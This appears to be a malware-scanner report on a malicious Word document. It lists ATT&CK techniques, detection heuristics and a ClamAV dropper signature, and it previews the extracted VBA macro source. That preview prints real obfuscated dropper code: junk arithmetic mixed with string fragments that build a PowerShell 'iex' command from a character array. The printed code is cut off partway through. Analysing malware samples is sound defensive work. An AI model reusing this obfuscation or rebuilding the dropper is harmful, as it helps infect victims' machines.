MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call and exhibits obfuscation, strongly suggesting it's designed to download and execute a secondary payload. The ClamAV signature 'Doc.Dropper.Agent-6587449-0' further confirms its malicious nature as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6587449-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6587449-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26552 bytes |
SHA-256: cacd39fea6d64ad2d0b6f26ff184e024b8049970f042165549a1d512d21bda86 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zzdYPwjMv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TjuBsShQ"
Function DkXtKs()
On Error Resume Next
jiAwk = (JzBVQK * 14898 + 57806 * CInt(ocjXW - CDbl(51929)) * 39020 * Oct(41780))
ZXEUb = "Hel" + "l " + " .(" + " $E" + "nV" + ":C" + "oM"
WQXwJ = (IaRof * 9973 + 67844 * CInt(RCWnZT - CDbl(48306)) * 20810 * Oct(15509))
XjlMUsPIiOj = "Spe" + "C[4" + ",26" + ",25" + "]-" + "jOi"
RIGsDV = (PJccTE * 24345 + 81840 * CInt(NptTwA - CDbl(10867)) * 59026 * Oct(28697))
BbCZD = "N'" + "')" + " ("
AnuCw = (IsiAG * 29534 + 45431 * CInt(uQvGVz - CDbl(96220)) * 19466 * Oct(93778))
ZLLUHmNo = " [s" + "tR" + "inG" + "]::" + "jO"
FjRofQ = (bdiVF * 39672 + 12940 * CInt(QKMipi - CDbl(96311)) * 34425 * Oct(97184))
QMMcqQidC = "IN" + "( " + "'' " + ", (" + " ["
iFzJR = (qqJwO * 90077 + 38996 * CInt(Nzilp - CDbl(49174)) * 77936 * Oct(91453))
jrZWcR = "CH" + "Ar" + "[]" + "](1"
DkXtKs = ZXEUb + XjlMUsPIiOj + BbCZD + ZLLUHmNo + QMMcqQidC + jrZWcR
bFmlcG = (HRSPz * 22715 + 6648 * CInt(MLfPK - CDbl(19144)) * 30021 * Oct(41295))
End Function
Function hFEAH()
On Error Resume Next
zUsEMc = (kmPXE * 59407 + 71215 * CInt(kIpzc - CDbl(9228)) * 29764 * Oct(3852))
cuqtcawnoz = "19," + "3 ," + "28,"
LYdtZk = (MjvmHO * 94955 + 90436 * CInt(tiKvfO - CDbl(64563)) * 50970 * Oct(34113))
wmICBbci = " 63" + " ," + "17" + " ,"
CUStlk = (zsnwf * 21265 + 4120 * CInt(LUiwGV - CDbl(20562)) * 88602 * Oct(15596))
TWaMLFCp = " 1" + "8 ," + " 11" + "5 "
ZFGOzr = (cuiKt * 81781 + 19493 * CInt(pQEHq - CDbl(27816)) * 38313 * Oct(15730))
HYihJ = ",1" + "10" + " ," + "115"
UtwbL = (raKKM * 59363 + 23470 * CInt(vwvCQT - CDbl(50337)) * 33658 * Oct(57638))
dFsJIRsFX = " ," + " 61" + ", " + "54" + " , " + "36 " + ",1"
hFEAH = cuqtcawnoz + wmICBbci + TWaMLFCp + HYihJ + dFsJIRsFX
wQEGm = (UFwut * 6263 + 86087 * CInt(Qlqjjj - CDbl(96410)) * 44977 * Oct(56686))
End Function
Function XDMJSZFz()
On Error Resume Next
JLuLDo = (DQZfvE * 72983 + 77034 * CInt(pGhRps - CDbl(6760)) * 38755 * Oct(73884))
WtfwfkYTRiw = "26," + "60," + " 4" + "9 ," + "57 "
dqizaZ = (XwbXIC * 16906 + 17968 * CInt(nSwVjE - CDbl(91458)) * 82812 * Oct(81355))
bNSuTAi = ", 5" + "4 ," + " 48" + ", " + "39" + ", 1"
pLrQHa = (XKuVS * 98389 + 11820 * CInt(hpMVh - CDbl(6874)) * 48266 * Oct(15916))
ozFEbJHJzj = "15" + " ," + "33" + ",50"
EkXRwZ = (qHijbf * 61242 + 38639 * CInt(jiwOVU - CDbl(38024)) * 80944 * Oct(24388))
MmHhEIoGd = " ," + "61" + ", " + "55" + " ," + "60"
PjWJoQ = (sMWCH * 47957 + 70802 * CInt(iKQWhB - CDbl(17844)) * 85225 * Oct(46364))
shrJjRHBpHh = " , " + "62" + ",10"
YatdkQ = (EzKLUw * 88801 + 36937 * CInt(nTzub - CDbl(10933)) * 26124 * Oct(28775))
IbnkbkcjGI = "4,1" + "19 " + ",3" + "5 ," + " 3"
XDMJSZFz = WtfwfkYTRiw + bNSuTAi + ozFEbJHJzj + MmHhEIoGd + shrJjRHBpHh + IbnkbkcjGI
KDTfwF = (zLPpJO * 53778 + 11876 * CInt(DZanJ - CDbl(24212)) * 42982 * Oct(6407))
End Function
Function TaGDjK()
On Error Resume Next
NpvdV = (NimZN * 27445 + 48765 * CInt(EVXmi - CDbl(56732)) * 25911 * Oct(47900))
bQAOObwoE = "0, " + "23," + "29"
qZYjnb = (zjQVkQ * 91590 + 38946 * CInt(wcfcCs - CDbl(12302)) * 57510 * Oct(46249))
MANTsa = " , " + "7 " + ", "
SmarZ = (ozEDzm * 49781 + 6820 * CInt(cjwEQ - CDbl(77381)) * 48824 * Oct(5410))
bizPrA = "24," + " 1" + "15 " + ",1"
iAiwpw = (uIRIv * 45205 + 79266 * CInt(YwSrQs - CDbl(17882)) * 5207 * Oct(53386))
mZMIjKnWMIj = "10" + ",11" + "5 ," + " 6" + "1, " + "54" + " ,"
ZLIZH = (tjdJYO * 84578 + 14795 * CInt(kCiIv - CDbl(16099)) * 9496 * Oct(83555))
jFOGp = "36" + ",1" + "26 " + ", 6" + "0 ," + "49," + " 57"
fUVim = (ZwGYQ * 73815 + 21249 * CInt(AkOMu - CDbl(61486)) * 33621 * Oct(19972))
pkaAhCw = " ,5" + "4 ," + " 48" + " ,"
Llfqi = (jPUUAu * 75229 + 23243 * CInt(wZkaH - CDbl(37125)) * 83474 * Oct(37623))
hHSDBDUDfWN = "39" + ", 1" + "15 " + ", 0" + " ,"
TaGDjK = bQAO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.